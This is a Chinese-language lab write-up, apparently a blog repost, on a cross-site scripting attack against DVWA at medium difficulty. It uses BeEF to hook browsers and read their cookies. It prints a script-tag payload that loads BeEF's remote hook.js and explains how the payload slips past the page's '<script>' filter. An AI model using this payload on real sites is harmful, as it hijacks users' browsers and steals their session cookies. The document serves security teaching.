跨站脚本攻击实验-beef

news2024/12/30 0:53:00

实验目的

  • 学习XSS工具/手工攻击的原理
  • 掌握XSS工具/手工攻击的方法
  • 学习防御XSS的方法/原理

    实验工具

  • burpsuite Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架.

  • Beef一个集成的浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具

    实验内容

XSS漏洞介绍

认识XSS

CSS跨站脚本攻击(Cross Site Scripting),为了不与层叠样式表(css)混淆,故称跨站脚本攻击缩写为XSS。

XSS(Cross Site Scripting )

  • XSS 攻击的危害没有得到应有的重视。在不同业务场景中,XSS会造成不同程度的危害,而XSS攻击的危害程度依赖于具体的业务环境。

  • XSS 漏洞攻击是发生在客户端的攻击,不会对网站所在服务器造成直接攻击。

  • XSS 漏洞的本质是网站没有很好的过滤客户所输入的数据,使恶意代码(payload)能够通过网站传递到客户端。

  • XSS 分类:

    1.反射型

    2.存储型

    3.DOM型

XSS (Reflected)反射型攻击发生的具体情景

  • 黑客发现一个存在XSS漏洞的接口或页面,构造恶意代码(payload)后,诱使客户打开恶意链接从而完成攻击。

窃取客户端Cookie资料是XSS攻击中最常见的应用方式之一

  • Cookie是由服务器提供的存储在客户端的数据,使JavaScript的开发人员能够将信息持久化保存在一个会话之间或多个会话之间。同时,由于Cookie是现今Web系统识别用户身份和保存会话状态的主要机制,一旦web应用程序中存在跨站脚本执行漏洞,那么攻击者就能欺骗用户从而轻易地获取cookie信息,执行恶意操作。

实验步骤

本次实验中,我们先找到xss漏洞,再使用BEFF获得cookie,最后分析源代码来了解漏洞详细信息。

步骤1:打开BEEF

首先我们打开beef

打开beef-xss,输入以下命令,查看beef-xss账号密码

cat /etc/beef-xss/config.yaml

登陆beef 用户名和密码都是 beef

初次登陆修改账号或者密码

输入 vim etc/beef-xss/config.yaml

输入命令 beef-xss启动图形化界面

图形化界面如下,账号密码是修改后的账号密码

步骤2:登陆DVWA

打开DVWA,将难度调至MEDIUM。

这里我们使用 payload: <script src="http://127.0.0.1:3000/hook.js"></script> 进行尝试。

注意:在插入到DVWA中的时候要把IP改为本机IP,也就是将beef提示的payload中的127.0.0.1改为172.16.11.2

这里对payload进行分析:XSS Payload其实就是一段Javascript脚本(还可以是Flash或其他富客户端的脚本),所以任何JavaScript脚本能实现的功能,XSS Payload都能做到。一个最常见的XSS Payload,就是通过读取浏览器的Cookie对象,从而发起Cookie 劫持攻击。Set-Cookie时给关键字Cookie植入HttpOnly标识、Cookie与IP绑定。

之后我们来到Beef中获取cookie。点击右侧任务栏中的Current Browser --> Commands 在 Module Tree 下查找到cookie的有关目录。执行Get Cookie,就可以获得当前的cookie值

从cookie中可以看到,security=medium 而我们的实验也是用的medium级别的,说明实验是成功的。在medium中 ,payload会显示为 security=medium 。

实验分析

点击 View Source 查看php源代码。

之后我们可以看到源代码。

首先第一行 array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) 通过一个if语句来判断用户是否输入了数据。里面的条件首先判断是否有GET请求之后判断输入内容是否为空,如用户提交了不为空的数据则进入if语句中。

其次第二行$name=str_replace('<script>','',$_GET['name']); 我们可以看到设计者使用str_replace函数替换<script>字符串为空来过滤。而我们的payload中并没有字符串<script>所以攻击仍然可以生效。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1015375.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

电路电子技术2电容电感伏安关系 计算电路中某两端电压

1.计算电流 思路:可以知道R1两端的电压,即U1,计算出流过R1的电流。接下来计算R2两端的电压,即US-U1,进而知道流过R2的电流。根据在节点处的KCL,即可求出I。 2.电容电感伏安关系 电容元件与电感元件的伏安…

购买问界M7大五座(自动驾驶走进我们的生活一)

龙龙在两天前下了问界M7大五座的大定(5000元),今天周末陪幺姨、姨爹、龙龙在重庆汽博问界4S店谈完了M7大五座的订购事宜。 早上10点到店后,姨爹在问界M5上完成了他的第一次自动驾驶试驾。小唐先开了一段路示范自驾,在回…

机器学习(16)---聚类(KMeans)

聚类 一、聚类概述1.1 无监督学习与聚类算法1.2 sklearn中的聚类算法 二、 KMeans2.1 基本原理2.2 簇内误差平方和 三、sklearn中的KMeans3.1 所用模块3.2 聚类算法的模型评估指标3.3 轮廓系数3.4 CHI(卡林斯基-哈拉巴斯指数) 四、KMeans做矢量量化4.1 概述4.2 案例 一、聚类概…

第二节:利用VBA代码交换三个单元格的值

【分享成果,随喜正能量】经常在做一件事时,一开始动力很足,可时间久了,就会出现意志力消耗殆尽。流水不腐,户枢不蠹。做一件对自己好的小事,养一个好习惯,慢慢坚持,持续去做&#xf…

[abc复盘] abc319 20230909

[abc复盘] abc319 20230909 总结A - Legendary Players1. 题目描述2. 思路分析3. 代码实现 B - Measure1. 题目描述2. 思路分析3. 代码实现 C - False Hope1. 题目描述2. 思路分析3. 代码实现 D - Minimum Width1. 题目描述2. 思路分析3. 代码实现 E - Bus Stops1. 题目描述2.…

k8s pod概念、分类及策略

目录 一.pod相关概念 2.Kubrenetes集群中Pod两种使用方式 3.pause容器的Pod中的所有容器共享的资源 4.kubernetes中的pause容器主要为每个容器提供功能: 6.Pod分为两类: 二.Pod容器的分类 1.基础容器…

第P5周—运动鞋识别

一、前期工作 1.导入数据集 数据集:工作台 - Heywhale.com import torch import matplotlib.pyplot as plt from torchvision import transforms, datasets import os, PIL, random, pathlibdata_dir rD:\P5-data\test data_dir pathlib.Path(data_dir)data_pa…

进程退出、孤儿进程、僵尸进程

进程退出 子进程退出&#xff0c;有些资源需要父进程去释放 /*#include <stdlib.h>void exit(int status);#include <unistd.h>void _exit(int status);status参数&#xff1a; 进程退出的一个状态信息。父进程回收资源的时候可以获取 */#include <stdlib.h>…

【C++】使用红黑树进行封装map和set

&#x1f307;个人主页&#xff1a;平凡的小苏 &#x1f4da;学习格言&#xff1a;命运给你一个低的起点&#xff0c;是想看你精彩的翻盘&#xff0c;而不是让你自甘堕落&#xff0c;脚下的路虽然难走&#xff0c;但我还能走&#xff0c;比起向阳而生&#xff0c;我更想尝试逆风…

【IEEE 13 节点分配系统中的THD降低】系统的谐波分析给出了各种总线上电流和电压的谐波频谱和THD(Simulink实现)

&#x1f4a5;&#x1f4a5;&#x1f49e;&#x1f49e;欢迎来到本博客❤️❤️&#x1f4a5;&#x1f4a5; &#x1f3c6;博主优势&#xff1a;&#x1f31e;&#x1f31e;&#x1f31e;博客内容尽量做到思维缜密&#xff0c;逻辑清晰&#xff0c;为了方便读者。 ⛳️座右铭&a…

phantomjs插件---实现通过链接生成网页截图

Phantomjs | PhantomJS 配置要求 windows下&#xff0c;安装完成phantomJS 设置phantomjs环境变量【也可直接使用phantomjs目录下的执行文件】 直接通过访问php文件执行/通过cmd命令行执行【phantomjs phantom_script.js】 linux下,安装完成phantomJS 设置phantomjs环境变量 直…

模拟实现链式二叉树及其结构学习——【数据结构】

W...Y的主页 &#x1f60a; 代码仓库分享 &#x1f495; 之前我们实现了用顺序表完成二叉树(也就是堆)&#xff0c;顺序二叉树的实际作用就是解决堆排序以及Topk问题。 今天我们要学习的内容是链式二叉树&#xff0c;并且实现链式二叉树&#xff0c;这篇博客与递归息息相关&a…

前端JavaScript中requestAnimationFrame:优化动画和渲染的利器

&#x1f3ac; 岸边的风&#xff1a;个人主页 &#x1f525; 个人专栏 :《 VUE 》 《 javaScript 》 ⛺️ 生活的理想&#xff0c;就是为了理想的生活 ! 目录 引言 1. requestAnimationFrame简介 2. requestAnimationFrame的属性 3. requestAnimationFrame的应用场景 3.1…

在Copernicus Data Space Ecosystem下载Sentinel数据及使用脚本检索和下载数据

文章目录 1.前言2.Copernicus Data Space Ecosystem使用介绍3.使用脚本检索和下载Sentinel数据4.最后 建了一个QQ群&#xff0c;大家可以在里边聊聊水色遥感数据下载和数据处理方面的事情&#xff1a;1087024529 1.前言 最近使用Sentinelsat库在Copernicus Open Access Hub下载…

线性代数的本质(三)——线性方程组

文章目录 线性方程组高斯消元法初等行变换线性方程组的解向量方程齐次线性方程组的解非齐次线性方程组的解 线性方程组 高斯消元法 客观世界最简单的数量关系是均匀变化的关系。在均匀变化问题中&#xff0c;列出的方程组是一次方程组&#xff0c;我们称之为线性方程组(Linea…

语音识别算法设计-基于MFCC+DTW算法-Matlab+C代码版本

语音识别算法设计-基于MFCCDTW算法-MatlabC代码&#xff08;全定点加速&#xff09;版本 语音识别算法主要涉及特征提取、统计建模和识别技术等几个关键方面。在此使用MFCCDTW算法的方式给出语音识别的代码&#xff0c;首先进行简单介绍。 Matlab版本代码地址&#xff1a;http…

基于STC15单片机温度光照检测系统-proteus仿真-源程序

一、系统方案 1、本设计采用STC15单片机作为主控器。 2、光敏电阻采集光照值送到液晶1602和串口显示。 3、DS18B20采集温度值&#xff0c;送到液晶1602和串口显示。 二、硬件设计 原理图如下&#xff1a; 三、单片机软件设计 1、首先是系统初始化 /-----------------------…

Vector 模拟实现

前言 本文将会向您介绍如何模拟实现vector 引入 Vector是一种动态数组&#xff0c;也是C标准库中的容器之一。它提供了一种存储和操作一系列元素的方式&#xff0c;类似于数组&#xff0c;但具有更多的功能和灵活性。 Vector可以存储不同类型的元素&#xff0c;并且可以根据…

关于老项目从JDK8升级到JDK17所需要注意的细节

文章目录 ☀️1.关于老项目从JDK8升级到JDK17所需要注意的细节&#x1f338;1.1.更新JDK&#x1f338;1.2.修改Idea中的JDK版本&#x1f338;1.3.关于修改过程中遇到的异常&#x1f338;1.4.IDEA工具栏操作Maven正常&#xff0c;但使用mvn命令运行就报错 ☀️1.关于老项目从JDK…

烧结金属材料和硬质合金弹性模量的测定

声明 本文是学习GB-T 5166-2023 烧结金属材料和硬质合金弹性模量的测定. 而整理的学习笔记,分享出来希望更多人受益,如果存在侵权请及时联系我们 1 范围 本文件描述了烧结金属材料和硬质合金弹性模量的测定方法。 本文件适用于采用纵向振动法测定烧结金属材料和硬质合金的动…